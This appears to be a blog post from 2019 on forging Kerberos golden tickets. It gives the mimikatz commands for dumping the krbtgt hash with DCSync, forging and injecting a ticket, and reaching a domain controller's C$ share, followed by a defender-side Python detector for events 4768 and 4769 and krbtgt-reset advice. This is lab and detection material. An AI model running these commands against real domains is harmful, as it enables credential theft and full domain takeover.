Domain Penetration: Golden Tickets


A golden ticket requires domain-controller privileges and, among other things, the hash of the krbtgt account, so the prerequisites are relatively demanding.

This time it succeeded.

I'm not sure every one of these articles is about this topic, but I'm listing them all. References:

https://klionsec.github.io/2016/08/10/ntlm-kerberos/  A deep understanding of the Windows security authentication mechanisms [NTLM & Kerberos]
https://wh0ale.github.io/2018/12/25/2018-12-25-%E5%9F%9F%E6%B8%97%E9%80%8F%E4%B9%8B%E7%A5%A8%E6%8D%AE/
http://www.vuln.cn/6699
https://blog.csdn.net/qq_36119192/article/details/92843080
http://www.moonsec.com/post-568.html
https://www.52os.net/articles/ms14-068-CVE-2014-6324-howto.html
https://blog.yuntest.org/jszy/7838.html
https://www.cnblogs.com/KevinGeorge/p/9099373.html
https://xz.aliyun.com/t/2527
https://www.jianshu.com/p/a3ddd7502c09
http://www.hetianlab.com/html/news/news-2016082601.html
https://1sparrow.com/2018/02/19/%E5%9F%9F%E6%B8%97%E9%80%8F%E7%9B%B8%E5%85%B3/
https://www.freebuf.com/sectool/112594.html
http://www.vuln.cn/6743
https://blog.csdn.net/pyphrb/article/details/52051321
https://github.com/gentilkiwi/mimikatz

The experiment:

1. Raise the process privilege to Debug on Windows (in mimikatz)
privilege::debug
2. Obtain the NTLM hash of krbtgt
lsadump::dcsync /domain:pentestlab.local /all /csv
Using the lsadump::lsa /patch command crashes on Windows 2012

3. Clear the cached tickets
kerberos::purge

4. Test
Generate the golden ticket:
kerberos::golden /admin:administrator /domain:test.com /sid:S-1-5-21-240842785-701863807-1442391399 /krbtgt:ee63ff54d1a75437d1db763ceefd9b71 /ticket:chocolate.kirbi
Inject it into the process:
kerberos::ptt chocolate.kirbi
Test succeeded:
dir \\Win-gu9sgoktm58\c$
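The steps above show why a forged TGT is hard to spot from the ticket alone: it is signed with the real krbtgt hash, so the KDC accepts it. What the domain controller does see is the sequence of events. A ticket injected with kerberos::ptt is never requested from the KDC, so the client's first visible Kerberos activity is a service-ticket request (event 4769) with no preceding TGT request (event 4768) from the same user and host. The following Python is an added, defender-side example written for this post, not code from the original article or from mimikatz; the event records are constructed, the field names are this example's own rather than the real event XML schema, the account list and 10-hour window are assumptions, and only the domain SID is taken from the post.

```python
"""Golden-ticket indicators from Kerberos ticket events (defender-side check).

Constructed sample records stand in for Windows Security events 4768 (TGT
requested) and 4769 (service ticket requested). Field names, the account
list and the window are assumptions made for this example.
"""
from datetime import datetime, timedelta

# Domain SID as used in the post; accounts and window are assumed values.
DOMAIN_SID = "S-1-5-21-240842785-701863807-1442391399"
KNOWN_ACCOUNTS = {"administrator", "alice", "svc_backup"}
TGT_WINDOW = timedelta(hours=10)  # assumed maximum TGT lifetime in the domain

# Constructed sample events, not real logs (times are ISO 8601 strings).
SAMPLE_EVENTS = [
    # Normal flow: the KDC issues a TGT, then a service ticket follows.
    {"id": 4768, "time": "2019-08-27T09:00:00", "user": "alice",
     "sid": DOMAIN_SID + "-1105", "client_ip": "10.0.0.21", "service": "krbtgt"},
    {"id": 4769, "time": "2019-08-27T09:00:05", "user": "alice",
     "sid": DOMAIN_SID + "-1105", "client_ip": "10.0.0.21", "service": "cifs/fileserver"},
    # A ticket carrying a SID that does not belong to this domain.
    {"id": 4769, "time": "2019-08-27T09:05:00", "user": "alice",
     "sid": "S-1-5-21-111-222-333-1105", "client_ip": "10.0.0.21", "service": "ldap/dc01"},
    # A service ticket appears with no TGT request from that user/host at all:
    # the TGT was injected locally, so the KDC never logged a 4768 for it.
    {"id": 4769, "time": "2019-08-27T10:30:00", "user": "administrator",
     "sid": DOMAIN_SID + "-500", "client_ip": "10.0.0.77", "service": "cifs/Win-gu9sgoktm58"},
    # Same host, this time with an account name that does not exist.
    {"id": 4769, "time": "2019-08-27T10:31:00", "user": "ghost",
     "sid": DOMAIN_SID + "-500", "client_ip": "10.0.0.77", "service": "ldap/dc01"},
]


def _when(event):
    return datetime.fromisoformat(event["time"])


def find_golden_ticket_indicators(events, known_accounts=KNOWN_ACCOUNTS,
                                  domain_sid=DOMAIN_SID, window=TGT_WINDOW):
    """Return (reason, event) pairs for 4769 events that look as if they were
    backed by a TGT the KDC never issued rather than a legitimate one."""
    findings = []
    last_tgt = {}  # (user, client_ip) -> time of the most recent 4768 seen
    for ev in sorted(events, key=_when):
        key = (ev["user"].lower(), ev["client_ip"])
        now = _when(ev)
        if ev["id"] == 4768:
            last_tgt[key] = now
            continue
        if ev["id"] != 4769:
            continue
        # Rule 1: every service-ticket request should follow a TGT request
        # from the same principal and host within the TGT lifetime.
        issued = last_tgt.get(key)
        if issued is None or now - issued > window:
            findings.append(("service ticket without a TGT request in window", ev))
        # Rule 2: the account named in the ticket must exist in the directory.
        if ev["user"].lower() not in known_accounts:
            findings.append(("account not present in directory", ev))
        # Rule 3: the SID in the ticket must belong to this domain.
        if not ev["sid"].startswith(domain_sid + "-"):
            findings.append(("SID outside the domain", ev))
    return findings


if __name__ == "__main__":
    for reason, ev in find_golden_ticket_indicators(SAMPLE_EVENTS):
        print(f"{ev['time']} {ev['client_ip']} {ev['user']}: {reason}")
```

Two caveats when turning this into a real detection: events 4768 and 4769 are written on whichever domain controller served the request, so the correlation only works over logs aggregated from every DC in the domain, and the window should reflect the domain's actual TGT lifetime and renewal behaviour rather than the assumed value above. The remediation that invalidates every ticket forged with a stolen krbtgt hash is resetting the krbtgt password twice, spaced so that replication completes in between.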

2019.8.27
